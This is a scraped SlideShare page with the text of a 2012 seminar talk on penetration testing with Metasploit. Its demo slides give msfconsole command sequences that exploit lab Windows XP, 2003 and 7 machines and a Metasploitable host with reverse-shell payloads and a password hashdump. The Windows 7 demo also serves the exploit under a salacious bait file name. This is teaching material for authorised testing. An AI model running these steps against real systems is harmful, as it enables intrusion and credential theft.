SlideShare a Scribd company logo

Pentest with Metasploit

M.Syarifudin, ST, OSCP, OSWP
M.Syarifudin, ST, OSCP, OSWP

This document summarizes a presentation about penetration testing with Metasploit. It introduces penetration testing and why organizations use it. It then discusses the basics of Metasploit, including interfaces like MSFconsole. Key concepts in Metasploit like exploits, payloads, and Meterpreter are explained. The presentation demonstrates Metasploit against different operating systems like Windows XP, Windows 7, and Ubuntu. It shows how to find and use appropriate exploits and payloads to gain remote access and post-exploitation activities.

1 of 36
Downloaded 1,007 times
penetrationtesting withmetasploit Presented by Syarif ! Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
Whoami • geek & Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
Ethics • Think before act • Don’t be stupid • Don’t be malicious
Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
<< back|track overview • Let’s Watch theVideo :)
<< back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
<< back|track overview
<< back|track overview
What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
MSFconsole
MSFcli
Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
OS in the Lab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
Any Question ? Contact me • website : http://fl3x.us • twitter : @fl3xu5
Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines
Ad

Recommended

Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Azure Penetration Testing
Azure Penetration TestingAzure Penetration Testing
Azure Penetration Testing
Cheah Eng Soon
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
Arpan Raval
 
System hacking
System hackingSystem hacking
System hacking
CAS
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security Fundamentals
Rahmat Suhatman
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
Raghav Bisht
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
Aman Srivastava
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 Presentation
Amy McMullin
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
Ronan Dunne, CEH, SSCP
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
Hishan Shouketh
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
Umesh Mahawar
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 
Intrusion Prevention System
Intrusion Prevention SystemIntrusion Prevention System
Intrusion Prevention System
Vishwanath Badiger
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynet
Sina Manavi
 
Information security
Information securityInformation security
Information security
Lusungu Mkandawire CISA,CISM,CGEIT,CPF,PRINCE2
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Computer security concepts
Computer security conceptsComputer security concepts
Computer security concepts
G Prachi
 
Social Network Security & Backdooring email
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
 
Wireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek Kominfo
M.Syarifudin, ST, OSCP, OSWP
 
Ad

More Related Content

What's hot (20)

Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
Raghav Bisht
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
Aman Srivastava
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 Presentation
Amy McMullin
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
Ronan Dunne, CEH, SSCP
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
Hishan Shouketh
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
Umesh Mahawar
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 
Intrusion Prevention System
Intrusion Prevention SystemIntrusion Prevention System
Intrusion Prevention System
Vishwanath Badiger
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynet
Sina Manavi
 
Information security
Information securityInformation security
Information security
Lusungu Mkandawire CISA,CISM,CGEIT,CPF,PRINCE2
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Computer security concepts
Computer security conceptsComputer security concepts
Computer security concepts
G Prachi
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
Priyanka Aash
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
Suvrat Jain
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
Raghav Bisht
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing Report
Aman Srivastava
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 Presentation
Amy McMullin
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
Ronan Dunne, CEH, SSCP
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellAll about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
Hishan Shouketh
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
Umesh Mahawar
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 
Intrusion Prevention System
Intrusion Prevention SystemIntrusion Prevention System
Intrusion Prevention System
Vishwanath Badiger
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynet
Sina Manavi
 
Information security
Information securityInformation security
Information security
Lusungu Mkandawire CISA,CISM,CGEIT,CPF,PRINCE2
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Computer security concepts
Computer security conceptsComputer security concepts
Computer security concepts
G Prachi
 

Viewers also liked (7)

Social Network Security & Backdooring email
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
 
Wireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek Kominfo
M.Syarifudin, ST, OSCP, OSWP
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
IPTV Security
IPTV SecurityIPTV Security
IPTV Security
M.Syarifudin, ST, OSCP, OSWP
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
M.Syarifudin, ST, OSCP, OSWP
 
Prepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec Professional
M.Syarifudin, ST, OSCP, OSWP
 
Information gath
Information gathInformation gath
Information gath
M.Syarifudin, ST, OSCP, OSWP
 
Social Network Security & Backdooring email
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
 
Wireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek Kominfo
M.Syarifudin, ST, OSCP, OSWP
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
IPTV Security
IPTV SecurityIPTV Security
IPTV Security
M.Syarifudin, ST, OSCP, OSWP
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
M.Syarifudin, ST, OSCP, OSWP
 
Prepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec Professional
M.Syarifudin, ST, OSCP, OSWP
 
Information gath
Information gathInformation gath
Information gath
M.Syarifudin, ST, OSCP, OSWP
 
Ad

Similar to Pentest with Metasploit (20)

Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
Windows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff Stokes
Jeff Stokes
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
Bangladesh Network Operators Group
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
PRISMA CSI
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara
 
Security Operation Center : Le Centre des Opérations de Sécurité est une div...
Security Operation Center : Le Centre des Opérations de Sécurité est une div...Security Operation Center : Le Centre des Opérations de Sécurité est une div...
Security Operation Center : Le Centre des Opérations de Sécurité est une div...
Khaledboufnina
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
L27
L27L27
L27
NathannyabvureMapisa
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
Windows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff Stokes
Jeff Stokes
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
Bangladesh Network Operators Group
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
PRISMA CSI
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara
 
Security Operation Center : Le Centre des Opérations de Sécurité est une div...
Security Operation Center : Le Centre des Opérations de Sécurité est une div...Security Operation Center : Le Centre des Opérations de Sécurité est une div...
Security Operation Center : Le Centre des Opérations de Sécurité est une div...
Khaledboufnina
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen
 
L27
L27L27
L27
NathannyabvureMapisa
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Ad

Recently uploaded (20)

Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)
Ortus Solutions, Corp
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)
Ortus Solutions, Corp
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
